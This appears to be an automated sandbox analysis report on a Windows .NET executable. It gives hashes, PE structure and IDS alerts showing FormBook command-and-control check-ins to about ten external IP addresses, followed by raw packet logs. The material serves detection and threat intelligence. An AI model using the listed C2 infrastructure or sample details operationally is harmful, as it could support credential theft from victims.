                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                Process:C:\Windows\SysWOW64\regini.exe
                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                Category:modified
                                                                Size (bytes):196608
                                                                Entropy (8bit):1.1215420383712111
                                                                Encrypted:false
                                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.7167851968389565
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:ZcshRk2lgh.exe
                                                                File size:834'048 bytes
                                                                MD5:8c6e69b99c8595bef72154984c028ade
                                                                SHA1:7f63a739e91dab69a4c3f45f3a75f6e0b0cf7b81
                                                                SHA256:29f5edb28740dda7118ed53f1432f02bb5a7f809075efb5d89f90016d0eedd00
                                                                SHA512:fdef5165cd2b89e71dab11312d6258710a97ebd8ea8f4b9ba8c1aabeff74d92822603d4a5920341cf9d2b933cd614cfc6a3bfbdc91a4b1788f45ff648a65068a
                                                                SSDEEP:12288:WC25usx+XtK1XXmiRg5VudJOYxtPle4+4y0xiZ0cC7CPMVeVkJ3TylS:qxZX2iC2dfxtP5JiZ0nCEVeJl
                                                                TLSH:5705F11632688807DAF647F40A71E1B417B96EAEB915E2DB4EC56DDFB8F2F001980713
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... Mg..............0...... ........... ........@.. ....................................@................................
                                                                Icon Hash:5ba4a66a2a263095
                                                                Entrypoint:0x4cb7d2
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x674D20CB [Mon Dec 2 02:51:55 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xcb780 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcc000 | 0x1c3c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xce000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc97d8 | 0xc9800 | e313db696b14e97c3c52c37b625dcd14 | False | 0.8861056723014888 | data | 7.724492265281776 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xcc000 | 0x1c3c | 0x1e00 | a63614dc20d6f65a2e8d8ce8eff31231 | False | 0.80546875 | data | 7.0655771259040705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xce000 | 0xc | 0x200 | 71952504d39ae1e59dee57e3d52818a5 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xcc100 | 0x164f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.951672211521625
RT_GROUP_ICON | 0xcd760 | 0x14 | data | | | 1.05
RT_VERSION | 0xcd784 | 0x2b8 | COM executable for DOS | | | 0.44971264367816094
RT_MANIFEST | 0xcda4c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T05:10:14.069277+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49974 | 74.48.143.82 | 80 | TCP
2025-01-11T05:10:29.897373+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49976 | 98.124.224.17 | 80 | TCP
2025-01-11T05:10:32.450166+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49977 | 98.124.224.17 | 80 | TCP
2025-01-11T05:10:34.983992+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49978 | 98.124.224.17 | 80 | TCP
2025-01-11T05:10:37.532611+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49979 | 98.124.224.17 | 80 | TCP
2025-01-11T05:10:43.716647+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49981 | 103.21.221.4 | 80 | TCP
2025-01-11T05:10:46.260735+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49982 | 103.21.221.4 | 80 | TCP
2025-01-11T05:10:48.816291+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49983 | 103.21.221.4 | 80 | TCP
2025-01-11T05:10:51.383858+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49984 | 103.21.221.4 | 80 | TCP
2025-01-11T05:10:57.436120+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49985 | 154.23.184.95 | 80 | TCP
2025-01-11T05:11:00.002724+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49986 | 154.23.184.95 | 80 | TCP
2025-01-11T05:11:02.537339+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49987 | 154.23.184.95 | 80 | TCP
2025-01-11T05:11:05.088776+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49988 | 154.23.184.95 | 80 | TCP
2025-01-11T05:11:10.843783+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49989 | 88.198.8.150 | 80 | TCP
2025-01-11T05:11:13.427684+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49990 | 88.198.8.150 | 80 | TCP
2025-01-11T05:11:16.124460+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49991 | 88.198.8.150 | 80 | TCP
2025-01-11T05:11:18.533489+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49992 | 88.198.8.150 | 80 | TCP
2025-01-11T05:11:24.157966+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49993 | 104.21.15.100 | 80 | TCP
2025-01-11T05:11:27.654504+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49994 | 104.21.15.100 | 80 | TCP
2025-01-11T05:11:29.288730+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49995 | 104.21.15.100 | 80 | TCP
2025-01-11T05:11:31.785036+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49996 | 104.21.15.100 | 80 | TCP
2025-01-11T05:11:37.668381+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49997 | 46.253.5.221 | 80 | TCP
2025-01-11T05:11:40.201873+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49998 | 46.253.5.221 | 80 | TCP
2025-01-11T05:11:42.759533+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49999 | 46.253.5.221 | 80 | TCP
2025-01-11T05:11:45.286570+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50000 | 46.253.5.221 | 80 | TCP
2025-01-11T05:11:51.567566+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50001 | 107.167.84.42 | 80 | TCP
2025-01-11T05:11:54.116612+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50002 | 107.167.84.42 | 80 | TCP
2025-01-11T05:11:56.683958+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50003 | 107.167.84.42 | 80 | TCP
2025-01-11T05:11:59.210138+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50004 | 107.167.84.42 | 80 | TCP
2025-01-11T05:12:04.843633+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50005 | 209.74.77.109 | 80 | TCP
2025-01-11T05:12:07.376635+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50006 | 209.74.77.109 | 80 | TCP
2025-01-11T05:12:10.245023+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50007 | 209.74.77.109 | 80 | TCP
2025-01-11T05:12:12.676593+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50008 | 209.74.77.109 | 80 | TCP
2025-01-11T05:12:18.242281+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50009 | 199.59.243.228 | 80 | TCP
2025-01-11T05:12:20.814141+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50010 | 199.59.243.228 | 80 | TCP
2025-01-11T05:12:23.362257+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 50011 | 199.59.243.228 | 80 | TCP
2025-01-11T05:12:26.928061+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 50013 | 199.59.243.228 | 80 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                Jan 11, 2025 05:11:16.124332905 CET804999188.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:16.124356031 CET804999188.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:16.124406099 CET804999188.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:16.124459982 CET4999180192.168.2.788.198.8.150
                                                                Jan 11, 2025 05:11:16.124514103 CET4999180192.168.2.788.198.8.150
                                                                Jan 11, 2025 05:11:16.810551882 CET4999180192.168.2.788.198.8.150
                                                                Jan 11, 2025 05:11:17.829008102 CET4999280192.168.2.788.198.8.150
                                                                Jan 11, 2025 05:11:17.834126949 CET804999288.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:17.834237099 CET4999280192.168.2.788.198.8.150
                                                                Jan 11, 2025 05:11:17.843693972 CET4999280192.168.2.788.198.8.150
                                                                Jan 11, 2025 05:11:17.848617077 CET804999288.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:18.533229113 CET804999288.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:18.533282995 CET804999288.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:18.533299923 CET804999288.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:18.533313990 CET804999288.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:18.533329010 CET804999288.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:18.533341885 CET804999288.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:18.533360004 CET804999288.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:18.533375025 CET804999288.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:18.533488989 CET4999280192.168.2.788.198.8.150
                                                                Jan 11, 2025 05:11:18.533526897 CET4999280192.168.2.788.198.8.150
                                                                Jan 11, 2025 05:11:18.538151026 CET4999280192.168.2.788.198.8.150
                                                                Jan 11, 2025 05:11:18.544028997 CET804999288.198.8.150192.168.2.7
                                                                Jan 11, 2025 05:11:23.567389011 CET4999380192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:23.573097944 CET8049993104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:23.576010942 CET4999380192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:23.590764046 CET4999380192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:23.596971035 CET8049993104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:24.152702093 CET8049993104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:24.153935909 CET8049993104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:24.157965899 CET4999380192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:25.107431889 CET4999380192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:26.126344919 CET4999480192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:26.131345034 CET8049994104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:26.132452011 CET4999480192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:26.146740913 CET4999480192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:26.151695013 CET8049994104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:27.654504061 CET4999480192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:27.704061031 CET8049994104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:28.672375917 CET4999580192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:28.677445889 CET8049995104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:28.677625895 CET4999580192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:28.692279100 CET4999580192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:28.697210073 CET8049995104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:28.697340012 CET8049995104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:29.288331985 CET8049995104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:29.288652897 CET8049995104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:29.288729906 CET4999580192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:29.510332108 CET8049994104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:29.510471106 CET4999480192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:30.201231956 CET4999580192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.219969988 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.225043058 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.225194931 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.234817028 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.239691019 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784411907 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784923077 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784935951 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784976006 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784986019 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.784996986 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.785003901 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.785022974 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.785034895 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.785036087 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.785044909 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.785125971 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.785126925 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.796931982 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.796952009 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:31.797126055 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.799858093 CET4999680192.168.2.7104.21.15.100
                                                                Jan 11, 2025 05:11:31.804687023 CET8049996104.21.15.100192.168.2.7
                                                                Jan 11, 2025 05:11:36.829547882 CET4999780192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:36.834383965 CET804999746.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:36.834465981 CET4999780192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:36.849097967 CET4999780192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:36.853981018 CET804999746.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:37.668147087 CET804999746.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:37.668230057 CET804999746.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:37.668380976 CET4999780192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:38.357567072 CET4999780192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:39.376761913 CET4999880192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:39.381792068 CET804999846.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:39.381953001 CET4999880192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:39.396920919 CET4999880192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:39.402056932 CET804999846.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:40.201736927 CET804999846.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:40.201767921 CET804999846.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:40.201873064 CET4999880192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:40.904532909 CET4999880192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:41.922923088 CET4999980192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:41.928029060 CET804999946.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:41.928193092 CET4999980192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:41.940936089 CET4999980192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:41.945815086 CET804999946.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:41.945949078 CET804999946.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:42.759365082 CET804999946.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:42.759429932 CET804999946.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:42.759532928 CET4999980192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:43.455172062 CET4999980192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:44.470546007 CET5000080192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:44.476819992 CET805000046.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:44.476936102 CET5000080192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:44.484338999 CET5000080192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:44.489100933 CET805000046.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:45.286318064 CET805000046.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:45.286385059 CET805000046.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:45.286570072 CET5000080192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:45.289122105 CET5000080192.168.2.746.253.5.221
                                                                Jan 11, 2025 05:11:45.293971062 CET805000046.253.5.221192.168.2.7
                                                                Jan 11, 2025 05:11:50.998991966 CET5000180192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:51.003948927 CET8050001107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:51.004112959 CET5000180192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:51.019176006 CET5000180192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:51.024117947 CET8050001107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:51.567260981 CET8050001107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:51.567341089 CET8050001107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:51.567565918 CET5000180192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:52.529455900 CET5000180192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:53.548408985 CET5000280192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:53.553426027 CET8050002107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:53.553613901 CET5000280192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:53.568902969 CET5000280192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:53.574361086 CET8050002107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:54.116445065 CET8050002107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:54.116544008 CET8050002107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:54.116611958 CET5000280192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:55.076227903 CET5000280192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:56.095556021 CET5000380192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:56.100394011 CET8050003107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:56.100501060 CET5000380192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:56.114789963 CET5000380192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:56.119666100 CET8050003107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:56.119683027 CET8050003107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:56.683727026 CET8050003107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:56.683903933 CET8050003107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:56.683958054 CET5000380192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:57.623334885 CET5000380192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:58.641830921 CET5000480192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:58.646753073 CET8050004107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:58.646965981 CET5000480192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:58.656742096 CET5000480192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:58.661659002 CET8050004107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:59.209815025 CET8050004107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:59.209968090 CET8050004107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:11:59.210138083 CET5000480192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:59.212894917 CET5000480192.168.2.7107.167.84.42
                                                                Jan 11, 2025 05:11:59.217710018 CET8050004107.167.84.42192.168.2.7
                                                                Jan 11, 2025 05:12:04.240389109 CET5000580192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:04.245232105 CET8050005209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:04.245323896 CET5000580192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:04.260195971 CET5000580192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:04.265155077 CET8050005209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:04.843435049 CET8050005209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:04.843528986 CET8050005209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:04.843632936 CET5000580192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:05.763854980 CET5000580192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:06.782243013 CET5000680192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:06.787116051 CET8050006209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:06.787241936 CET5000680192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:06.801193953 CET5000680192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:06.806054115 CET8050006209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:07.376384974 CET8050006209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:07.376538992 CET8050006209.74.77.109192.168.2.7
                                                                Jan 11, 2025 05:12:07.376635075 CET5000680192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:08.310883045 CET5000680192.168.2.7209.74.77.109
                                                                Jan 11, 2025 05:12:09.329188108 CET5000780192.168.2.7209.74.77.109
